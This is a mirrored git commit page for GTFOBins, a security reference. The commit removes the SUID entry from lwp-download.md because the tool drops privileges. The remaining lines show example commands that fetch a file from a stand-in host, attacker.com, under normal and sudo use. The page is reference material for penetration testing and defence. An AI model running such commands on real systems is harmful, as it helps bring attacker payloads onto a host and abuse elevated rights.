mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Update lwp-download.md
lwp-download drop the elevated privileges
This commit is contained in:
parent
494ea89794
commit
313a49d9f7
@ -6,11 +6,6 @@ functions:
|
|||||||
URL=http://attacker.com/file_to_get
|
URL=http://attacker.com/file_to_get
|
||||||
LFILE=file_to_save
|
LFILE=file_to_save
|
||||||
lwp-download $URL $LFILE
|
lwp-download $URL $LFILE
|
||||||
suid:
|
|
||||||
- code: |
|
|
||||||
URL=http://attacker.com/file_to_get
|
|
||||||
LFILE=file_to_save
|
|
||||||
./lwp-download $URL $LFILE
|
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
URL=http://attacker.com/file_to_get
|
URL=http://attacker.com/file_to_get
|
||||||
|
Loading…
Reference in New Issue
Block a user